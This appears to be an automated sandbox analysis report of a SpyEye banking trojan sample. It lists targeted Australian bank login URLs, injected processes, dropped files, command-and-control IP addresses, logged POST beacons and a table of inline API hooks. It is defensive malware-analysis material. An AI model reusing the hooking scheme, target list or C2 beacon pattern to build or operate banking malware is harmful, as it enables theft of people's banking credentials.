https://secure.defcredit.com.au/daib/logon/cu3205/logon.asp svchost.exe
https://webbanker.cua.com.au/webbanker/4/cua? svchost.exe
https://www.fmc.com.au/ma svchost.exe
https://www.fmc.com.au/mac/ svchost.exe
https://www.netteller.com.au/802147v47/ntv svchost.exe
https://www1.membersequitybank.com.au/me svchost.exe
- Bank names
String value Source
WINTRUST.dll equals www.wintrust.com (Wintrust Financial Corporation) svchost.exe
https://ibank.b-e.com.au/ibank/ equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://ibank.b-e.com.au/ibank/login.asp 500 500 20 90 equals www.ibank.com.ph (International Exchange Bank) MDM.EXE
https://ibank.b-e.com.au/ibank/login.asp equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://ibank.melbcdf.com.au/brisbanemyviewpoint/Login.asp 500 500 20 90 equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://ibank.melbcdf.com.au/brisbanemyviewpoint/Login.asp equals www.ibank.com.ph (International Exchange Bank) svchost.exe
https://online.westpac.com.au/esis/Login/SrvPage 500 500 20 90 equals www.westpac.com.au (Westpac Banking Corp) svchost.exe
https://online.westpac.com.au/esis/Login/SrvPage equals www.westpac.com.au (Westpac Banking Corp) svchost.exe
ibank.b-e.com.au/ibank/login.asp equals www.ibank.com.ph (International Exchange Bank) svchost.exe
Analysis Overview
+ Startup
  • system is xp
  • SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe (PID: 3660 MD5: 62D0915F2D31D0A060671D31419A0B80)
    • explorer.exe (PID: 1636 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
      • winlogon.exe (PID: 636 MD5: ED0EF0A136DEC83DF69F04118870003E)
      • lsass.exe (PID: 692 MD5: BF2466B3E18E970D8A976FB95FC1CA85)
      • svchost.exe (PID: 892 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 968 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 1052 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 1100 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • svchost.exe (PID: 1144 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • spoolsv.exe (PID: 1496 MD5: 60784F891563FB1B767F70117FC2428F)
      • ctfmon.exe (PID: 1828 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)
      • svchost.exe (PID: 448 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
      • jqs.exe (PID: 508 MD5: 5E06A9D23727DAF96FAA796F1135FDCD)
      • alg.exe (PID: 1988 MD5: 8C515081584A38AA007909CD02020B3D)
      • wscntfy.exe (PID: 236 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
      • msiexec.exe (PID: 724 MD5: 5879D691E842574A20FE63817CB76DF9)
      • wmiprvse.exe (PID: 1120 MD5: 798A9E6828997EEF4517ADA8A2259831)
      • OSE.EXE (PID: 2000 MD5: 7A56CF3E3F12E8AF599963B16F50FB6A)
      • MDM.EXE (PID: 2224 MD5: 11F714F85530A2BD134074DC30E99FCA)
      • svchost.exe (PID: 2264 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup
+ Dropped Files
File Path MD5
C:\Recycle.Bin\07A49F015E0D693 EC5FBD162A37BF766A414BFA544C74D3
C:\Recycle.Bin\B6232F3AC2C.exe 62D0915F2D31D0A060671D31419A0B80
+ Involved IP Addresses
IP ASN ASN Description ASN State
66.199.227.66 AS15149 EZZI-101-BGP - Access Integrated Technologies, Inc. US
66.199.247.26 AS15149 EZZI-101-BGP - Access Integrated Technologies, Inc. US
195.186.1.121 AS44038 BLUEWIN-AS Swisscom (Schweiz) AG CH
Global Network Data
+ All TCP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 14:59:43.828185081 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.828212976 CET 53 1079 66.199.227.66 192.168.0.10
Dec 1, 2011 14:59:43.828391075 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.828881025 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.828891039 CET 53 1079 66.199.227.66 192.168.0.10
Dec 1, 2011 14:59:43.829310894 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:43.847482920 CET 53 1079 66.199.227.66 192.168.0.10
Dec 1, 2011 14:59:43.847708941 CET 1079 53 192.168.0.10 66.199.227.66
Dec 1, 2011 14:59:52.849962950 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:52.850006104 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 14:59:52.850305080 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:52.855242014 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:52.855256081 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 14:59:59.520051956 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 14:59:59.520442009 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:59.521433115 CET 1080 80 192.168.0.10 66.199.247.26
Dec 1, 2011 14:59:59.521449089 CET 80 1080 66.199.247.26 192.168.0.10
Dec 1, 2011 15:01:29.000931978 CET 1083 80 192.168.0.10 66.199.227.66
Dec 1, 2011 15:01:29.000960112 CET 80 1083 66.199.227.66 192.168.0.10
Dec 1, 2011 15:01:29.001317978 CET 1083 80 192.168.0.10 66.199.227.66
Dec 1, 2011 15:01:29.003742933 CET 1083 80 192.168.0.10 66.199.227.66
Dec 1, 2011 15:01:29.003757954 CET 80 1083 66.199.227.66 192.168.0.10
+ All UDP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 14:59:59.537770033 CET 56090 53 192.168.0.10 195.186.1.121
Dec 1, 2011 14:59:59.537837029 CET 53 56090 195.186.1.121 192.168.0.10
+ HTTP
Timestamp Source Port Dest Port Source IP Dest IP Header
Dec 1, 2011 14:59:52.855242014 CET 1080 80 192.168.0.10 66.199.247.26 POST /test.pdf HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 66.199.247.26
Content-Length: 256
Cache-Control: no-cache
Dec 1, 2011 15:01:29.003742933 CET 1083 80 192.168.0.10 66.199.227.66 POST /test.pdf HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 66.199.227.66
Content-Length: 256
Cache-Control: no-cache
Hooks
+ User Modules
+ Hook Summary
Function Name Hook Type Active in Processes
send INLINE jqs.exe, svchost.exe, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
TranslateMessage INLINE jqs.exe, svchost.exe, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
PFXImportCertStore INLINE jqs.exe, svchost.exe, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
CryptEncrypt INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwVdmControl INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtResumeThread INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwEnumerateValueKey INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwResumeThread INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtVdmControl INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwSetInformationFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtEnumerateValueKey INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtQueryDirectoryFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwQueryDirectoryFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
NtSetInformationFile INLINE jqs.exe, svchost.exe, OSE.EXE, MDM.EXE, spoolsv.exe, explorer.exe, lsass.exe, winlogon.exe
ZwClose INLINE wscntfy.exe, svchost.exe, alg.exe, ctfmon.exe, msiexec.exe
NtClose INLINE wscntfy.exe, svchost.exe, alg.exe, ctfmon.exe, msiexec.exe
HttpSendRequestA INLINE explorer.exe, svchost.exe
HttpSendRequestW INLINE explorer.exe, svchost.exe
InternetWriteFile INLINE explorer.exe, svchost.exe
InternetCloseHandle INLINE explorer.exe, svchost.exe
InternetReadFile INLINE svchost.exe
HttpOpenRequestA INLINE svchost.exe
InternetQueryDataAvailable INLINE svchost.exe
InternetReadFileExA INLINE svchost.exe
HttpQueryInfoA INLINE svchost.exe
InternetQueryOptionA INLINE svchost.exe
HttpAddRequestHeadersA INLINE svchost.exe
+ Processes
+ Process: jqs.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: jqs.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: OSE.EXE, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: OSE.EXE, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: wscntfy.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: MDM.EXE, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: MDM.EXE, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: MDM.EXE, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x35
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x35
+ Process: spoolsv.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: spoolsv.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: WININET.dll
Function Name Hook Type New Data
HttpSendRequestA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: explorer.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: svchost.exe, Module: WININET.dll
Function Name Hook Type New Data
InternetReadFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpOpenRequestA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryDataAvailable INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetReadFileExA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpQueryInfoA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryOptionA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpAddRequestHeadersA INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: alg.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
+ Process: ctfmon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
+ Process: lsass.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: lsass.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: msiexec.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x30
+ Process: svchost.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
NtClose INLINE 0xE9 0x9B 0xBF 0xF3 0x33 0x31
+ Process: winlogon.exe, Module: USER32.dll
Function Name Hook Type New Data
TranslateMessage INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtSetInformationFile INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: WS2_32.dll
Function Name Hook Type New Data
send INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Process: winlogon.exe, Module: ADVAPI32.dll
Function Name Hook Type New Data
CryptEncrypt INLINE 0xEB 0xB0 0x01 0x1C 0xC3 0x3E
+ Sections
+ General
Start time: 05:47:51
Start date: 01/12/2011
Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Commandline: not known
Imagebase: 0x400000
File size: 254976 bytes
MD5 hash: 62D0915F2D31D0A060671D31419A0B80
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 3 403AA1
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 402B90
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Recycle.Bin\ read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 BD0179
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 1 4027F3
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 40282F
